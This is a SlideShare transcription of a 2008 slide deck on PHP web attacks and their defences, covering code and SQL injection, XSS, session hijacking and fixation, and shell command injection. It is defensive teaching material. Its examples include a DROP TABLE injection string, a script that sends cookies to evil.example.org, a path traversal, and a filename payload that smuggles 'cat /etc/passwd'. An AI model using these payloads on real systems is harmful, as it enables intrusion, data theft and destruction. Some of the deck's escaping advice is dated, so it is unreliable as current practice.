SlideShare a Scribd company logo

PHP Secure Programming

Balavignesh Kasinathan
Balavignesh Kasinathan

PHP Attacks and Defense. The common web attacks and prevention by using PHP programming.

Software
1 of 39
Download to read offline
1 PHP Attacks and Defense K.Bala Vignesh kbalavignesh@gmail.com
2 Most Secured computer in the WORLD No Need to secure the OS No Need to secure the S/W No need to do Anything It's Naturally Secured
3 Even No Need to Switch ON
4 Web ­Security ? PHP ?
5 Fact : 1 PHP Mainly for Web Programs Fact : 2 Easy To Learn
6 PHP: 20,917,850 domains, 1,224,183 IP addresses Fact : 3 Fact : 4 More Flexible Functions
7 Few Named threats Code Injection SQL Injection Cross Site Script (XSS) Session Hijacking Session Fixation Temp Files abuse Remote Execution More and More unNamed threats...
8 Code Injection
Code Injection 9 Dont directly pass the filenames $filename = $_REQUEST['message']; $message = file_get_contents($filename); print $message; This is ok: http://example.com/myscript.php?message=hello.txt But what if I do like this?: http://example.com/myscript.php?message=passwords.txt
Code Injection 10 This is especially important for includes, require and require_once $module = $_REQUEST['module']; include(“lib/$module”); This is ok: http://example.com/cms?module=login.php But what if I do like this?: http://example.com/cms?module=../passwords.ini
Defense Code Injection 11 Make sure the value is one you expected, if not...ERROR! $requestedModule = $_REQUEST['module']; switch($requestedModule) { case “login”: $module = “login”; break; case “logout”: $module = “logout”; break; default: $module = “error”; }
12 SQL Injection
13 Form to user search .... $username=$_POST['username']; $query= "SELECT * FROM users WHERE name = ' “ .$username." ' ;" If i give , $username ­­­a' or 't'='t Query will be , "SELECT * FROM users WHERE name = ' a' or 't'='t ';" SQL Injection
14 If i give , $username ­­­a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '% Query will be , SELECT * FROM users WHERE name = ' a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '% '; SQL Injection
15 Use single quotation eg: "select * from users where user= '.$username.'" Check types of user submitted values is_bool(), is_float(), is_numeric(), is_string(), is_int() , intval() , settype() ,strlen() eg: strpos($query , ';') Escape every questionable character in your query ' " , ; ( ) and keywords "FROM", "LIKE", and "WHERE" mysql_real_escape_string SQL Injection Defense
16 magic_quotes_gpc (default – on ) (deprecation – php 6.0) If Off use addslashes If On , If you don't need stripslashes if (get_magic_quotes_gpc()){ $_GET = array_map('stripslashes', $_GET); $_POST = array_map('stripslashes', $_POST); $_COOKIE = array_map('stripslashes', $_COOKIE); } SQL Injection Defense
17 Mysql Improved Extension $query=mysqli_prepare($connection_string, "select * from user where user= ?"); mysqli_stmt_bind_param($query,"s",$username); mysqli_stmt_execute($query); s­string i­integer d­double b­binary PEAR ­DB, DataObject SQL Injection Defense
18 XSS – Cross Site Scripting
19 1.) Inserting scripts <script> document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie </script> 2.) Login 3.) Set Cookies 4.) Executes the scripts XSS 5.) Steals the cookies
20 Remote control of the client browser Reveal the value of a cookie Change links on the page Redirect to another URI Render a bogus form or Any undesirable action ... XSS
Defense XSS Encode HTML Entities in All Non­HTML Output 21 htmlentities() Eg: $str = "A 'quote' is <b>bold</b>"; echo htmlentities($str); Outputs Will be ­> A 'quote' is &lt;b&gt;bold&lt;/b&gt; Check the image upload URI (avatar, icon) parse_url Eg: <img src=”http://shopping.example.com/addCart.php?item=123”/> Show the domain name for User submitted Links eg. Not safe ­­> Hey click this to see my photo <a href=”http://badguys.net”>Bala</a> safe ­­> Hey click this to see my photo [badguys.net] Bala
22 Session Hijacking
23 What is Session ID ?
24 Victim Attacker Web Server Session ID= AD238723FD32 Session Hijacking
25 Victim Attacker Web Server Session ID= AD238723FD32 Session ID= AD238723FD32 Session Hijacking
Session Hijacking 26 Network Eavesdropping ­Promiscuous Mode If Intranet ? Use Switch rather than a Hub If wi­fi ? WEP ­Weired Equivalent Privacy If Internet ? SSL
27 Session Hijacking Unwitting Exposure Sending links See this item ­­­­http:// store.com/items.php?item=0987 it's O.K , if i send like this, http://store.com/items.php?item=0987&phpsessid=34223 How to Avoid ? session.use_trans_sid (turned off by default) session.use_only_cookies (Defaults to 1 (enabled) since PHP 6.0.)
28 2.) If he clicks, http://unsafesite?SID=3423 3. Shows login page Victim Session Fixation Attacker Web Server 1.) See this link http://unsafesite?SID=3423 Set SessionID =3423 session_id($_GET['SID']) 4.) Now Full Access http://unsafesite?SID=3423
29 Session Hijacking Defense Use SSL. Use Cookies Instead of $_GET Variables. (ini_set ('session.use_only_cookies',TRUE); ini_set ('session.use_trans_sid',FALSE); Use Session Timeouts ini_set('session.cookie_lifetime',1200) ini_set('session.gc_maxlifetime) Regenerate IDs for Users with Changed Status session_regenerate_id
30 Remote Execution
Remote Execution 31 Injection of Shell commands <?php $filename=$_GET['filename']; $command='/usr/bin/wc $filename”; $words=shell_exec ($command); print “$filename contains $words words.”; ?> This is ok ... wordcount.php?filename=textfile.txt But, What if i give like this ... wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd (filename ­­> /dev/null | cat /etc/passwd ) /usr/bin/wc /dev/null |cat /etc/passwd
Remote Execution 32 Defense Allow only Trusted , Human Users to Import Code Store uploads outside of Web Document Root Limit allowable filename extensions for upload Use disable_functions directive eg: disable_functions= “eval,phpinfo” Do not include PHP scripts from Remote Servers eg: <?php include ('http://example.net/code/common.php') ?> Properly escape all shell commands escapeshellarg() , escapeshellcmd()
33 Future? ­PHP 6.0 Deprecation Register Globals Big security hole Safe Mode False sense of security Magic Quotes Messed with the data Upcoming changes and features http://www.php.net/~derick/meeting­notes. html http://www.phphacks.com/content/view/49/33/ Rasmus Lerdorf – PHP 6.0 Wish List http://news.php.net/php.internals/17883
34 What to do? Proper Input Validation Dont do Programming + Security Do secure Programming htmlentities, mysql_real_escape_string, parse_url , addslashes ,escapeshellarg, escapeshellcmd... etc SSL Use PEAR , PECL
Images From Flickr.com 35 reference­http:// flickr.com/photos/opinicus/246099418/ remote_boy ­http:// flickr.com/photo_zoom.gne?id=331355695&size=l level_cross ­http:// flickr.com/photo_zoom.gne?id=67342604&size=o injection3­http:// flickr.com/photos/fleurdelisa/249435636/ building game1­http:// flickr.com/photo_zoom.gne?id=346575350&size=o computer_baby1­http:// flickr.com/photo_zoom.gne?id=102207751&size=o country_border1 ­http:// flickr.com/photo_zoom.gne?id=48740674&size=l computer_baby ­http:// flickr.com/photo_zoom.gne?id=436594815&size=m hijack ­http:// flickr.com/photo_zoom.gne?id=463129891&size=l dog_security ­http:// flickr.com/photo_zoom.gne?id=2205272682&size=l Id card ­http:// flickr.com/photo_zoom.gne?id=1269802640&size=o
36 Reference Pro PHP Security Chris Snyder , Michael Southwell http://wikipedia.org/ http://www.sitepoint.com/article/php­security­blunders http://phpsec.org/ WWW.google.com
37
38
Copyright (c) 2008 Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation. http://www.gnu.org/copyleft/fdl.html

Recommended

PHP Security
PHP SecurityPHP Security
PHP Securitymanugoel2003
 
2013 05-03 - HTML5 & JavaScript Security
2013 05-03 - HTML5 & JavaScript Security2013 05-03 - HTML5 & JavaScript Security
2013 05-03 - HTML5 & JavaScript SecurityJohannes Hoppe
 
Php Security
Php SecurityPhp Security
Php Securityguest7cf35c
 
PHP Security
PHP SecurityPHP Security
PHP SecurityMindfire Solutions
 
Rails and security
Rails and securityRails and security
Rails and securityAndrey Tokarchuk
 
PHP security audits
PHP security auditsPHP security audits
PHP security auditsDamien Seguy
 
Angular js security
Angular js securityAngular js security
Angular js securityJose Manuel Ortega Candel
 
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013Michelangelo van Dam
 

Recommended

PHP Security
PHP SecurityPHP Security
PHP Securitymanugoel2003
 
2013 05-03 - HTML5 & JavaScript Security
2013 05-03 - HTML5 & JavaScript Security2013 05-03 - HTML5 & JavaScript Security
2013 05-03 - HTML5 & JavaScript SecurityJohannes Hoppe
 
Php Security
Php SecurityPhp Security
Php Securityguest7cf35c
 
PHP Security
PHP SecurityPHP Security
PHP SecurityMindfire Solutions
 
Rails and security
Rails and securityRails and security
Rails and securityAndrey Tokarchuk
 
PHP security audits
PHP security auditsPHP security audits
PHP security auditsDamien Seguy
 
Angular js security
Angular js securityAngular js security
Angular js securityJose Manuel Ortega Candel
 
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013Michelangelo van Dam
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Learning Dtrace
Learning DtraceLearning Dtrace
Learning DtraceJeongHun Byeon
 
Practical django secuirty
Practical django secuirtyPractical django secuirty
Practical django secuirtyAndy Dai
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeWim Godden
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
OWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinOWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinTobias Zander
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmersrjsmelo
 
Php101
Php101Php101
Php101Ömer Taşkın
 
When dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWhen dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWim Godden
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...GeeksLab Odessa
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Code obfuscation, php shells & more
Code obfuscation, php shells & moreCode obfuscation, php shells & more
Code obfuscation, php shells & moreMattias Geniar
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application SecurityMahmud Ahsan
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 
Secure shell protocol
Secure shell protocolSecure shell protocol
Secure shell protocolBaspally Sai Anirudh
 
Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...Thoughtworks
 

More Related Content

What's hot

End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Practical django secuirty
Practical django secuirtyPractical django secuirty
Practical django secuirtyAndy Dai
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeWim Godden
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
OWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinOWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinTobias Zander
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmersrjsmelo
 
When dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWhen dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWim Godden
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...GeeksLab Odessa
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Code obfuscation, php shells & more
Code obfuscation, php shells & moreCode obfuscation, php shells & more
Code obfuscation, php shells & moreMattias Geniar
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application SecurityMahmud Ahsan
 

What's hot (19)

End to end web security
End to end web securityEnd to end web security
End to end web security
 
Learning Dtrace
Learning DtraceLearning Dtrace
Learning Dtrace
 
Practical django secuirty
Practical django secuirtyPractical django secuirty
Practical django secuirty
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the code
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
 
OWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinOWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in Berlin
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmers
 
Php101
Php101Php101
Php101
 
When dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWhen dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniques
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Code obfuscation, php shells & more
Code obfuscation, php shells & moreCode obfuscation, php shells & more
Code obfuscation, php shells & more
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
 

Viewers also liked

Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 
Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...Thoughtworks
 
Practical Example of grep command in unix
Practical Example of grep command in unixPractical Example of grep command in unix
Practical Example of grep command in unixJavin Paul
 
Sed & awk the dynamic duo
Sed & awk the dynamic duoSed & awk the dynamic duo
Sed & awk the dynamic duoJoshua Thijssen
 
Unix command-line tools
Unix command-line toolsUnix command-line tools
Unix command-line toolsEric Wilson
 
Defeating The Network Security Infrastructure V1.0
Defeating The Network Security Infrastructure V1.0Defeating The Network Security Infrastructure V1.0
Defeating The Network Security Infrastructure V1.0Philippe Bogaerts
 
Unix Command Line Productivity Tips
Unix Command Line Productivity TipsUnix Command Line Productivity Tips
Unix Command Line Productivity TipsKeith Bennett
 
Learning sed and awk
Learning sed and awkLearning sed and awk
Learning sed and awkYogesh Sawant
 
Practical unix utilities for text processing
Practical unix utilities for text processingPractical unix utilities for text processing
Practical unix utilities for text processingAnton Arhipov
 
Secure Shell(ssh)
Secure Shell(ssh)Secure Shell(ssh)
Secure Shell(ssh)Pina Parmar
 
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPVirtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPMichael Coates
 
Top 100 Linux Interview Questions and Answers 2014
Top 100 Linux Interview Questions and Answers 2014Top 100 Linux Interview Questions and Answers 2014
Top 100 Linux Interview Questions and Answers 2014iimjobs and hirist
 
RHCE FINAL Questions and Answers
RHCE FINAL Questions and AnswersRHCE FINAL Questions and Answers
RHCE FINAL Questions and AnswersRadien software
 
Introduction to SSH
Introduction to SSHIntroduction to SSH
Introduction to SSHHemant Shah
 

Viewers also liked (20)

Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHP
 
Secure shell protocol
Secure shell protocolSecure shell protocol
Secure shell protocol
 
Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...
 
How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF
 
Practical Example of grep command in unix
Practical Example of grep command in unixPractical Example of grep command in unix
Practical Example of grep command in unix
 
class12_Networking2
class12_Networking2class12_Networking2
class12_Networking2
 
Sed & awk the dynamic duo
Sed & awk the dynamic duoSed & awk the dynamic duo
Sed & awk the dynamic duo
 
Unix command-line tools
Unix command-line toolsUnix command-line tools
Unix command-line tools
 
Defeating The Network Security Infrastructure V1.0
Defeating The Network Security Infrastructure V1.0Defeating The Network Security Infrastructure V1.0
Defeating The Network Security Infrastructure V1.0
 
Unix Command Line Productivity Tips
Unix Command Line Productivity TipsUnix Command Line Productivity Tips
Unix Command Line Productivity Tips
 
Learning sed and awk
Learning sed and awkLearning sed and awk
Learning sed and awk
 
Practical unix utilities for text processing
Practical unix utilities for text processingPractical unix utilities for text processing
Practical unix utilities for text processing
 
Secure SHell
Secure SHellSecure SHell
Secure SHell
 
SSH
SSHSSH
SSH
 
Secure Shell(ssh)
Secure Shell(ssh)Secure Shell(ssh)
Secure Shell(ssh)
 
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPVirtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
 
SSH - Secure Shell
SSH - Secure ShellSSH - Secure Shell
SSH - Secure Shell
 
Top 100 Linux Interview Questions and Answers 2014
Top 100 Linux Interview Questions and Answers 2014Top 100 Linux Interview Questions and Answers 2014
Top 100 Linux Interview Questions and Answers 2014
 
RHCE FINAL Questions and Answers
RHCE FINAL Questions and AnswersRHCE FINAL Questions and Answers
RHCE FINAL Questions and Answers
 
Introduction to SSH
Introduction to SSHIntroduction to SSH
Introduction to SSH
 

Similar to PHP Secure Programming

General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggetsguestbd1cdca
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Indexwebhostingguy
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101brian_dailey
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentationSqa Enthusiast
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 

Similar to PHP Secure Programming (20)

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Web Security
Web SecurityWeb Security
Web Security
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentation
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
XSS
XSSXSS
XSS
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 

More from Balavignesh Kasinathan

More from Balavignesh Kasinathan (6)

John muir
John muirJohn muir
John muir
 
Backbone 4.0
Backbone 4.0Backbone 4.0
Backbone 4.0
 
Introduction to Scrum
Introduction to ScrumIntroduction to Scrum
Introduction to Scrum
 
Introduction to Opensource
Introduction to Opensource Introduction to Opensource
Introduction to Opensource
 
Version Management with CVS
Version Management with CVSVersion Management with CVS
Version Management with CVS
 
Trainer GUI for Tesseract
Trainer GUI for TesseractTrainer GUI for Tesseract
Trainer GUI for Tesseract
 

Recently uploaded

Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringHironori Washizaki
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtimeandrehoraa
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
Recruitment Management Software Benefits (Infographic)
Recruitment Management Software Benefits (Infographic)Recruitment Management Software Benefits (Infographic)
Recruitment Management Software Benefits (Infographic)Hr365.us smith
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmSujith Sukumaran
 
Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Mater
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样umasea
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfMarharyta Nedzelska
 
cpct NetworkING BASICS AND NETWORK TOOL.ppt
cpct NetworkING BASICS AND NETWORK TOOL.pptcpct NetworkING BASICS AND NETWORK TOOL.ppt
cpct NetworkING BASICS AND NETWORK TOOL.pptrcbcrtm
 
PREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentationPREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentationvaddepallysandeep122
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprisepreethippts
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Angel Borroy López
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsChristian Birchler
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
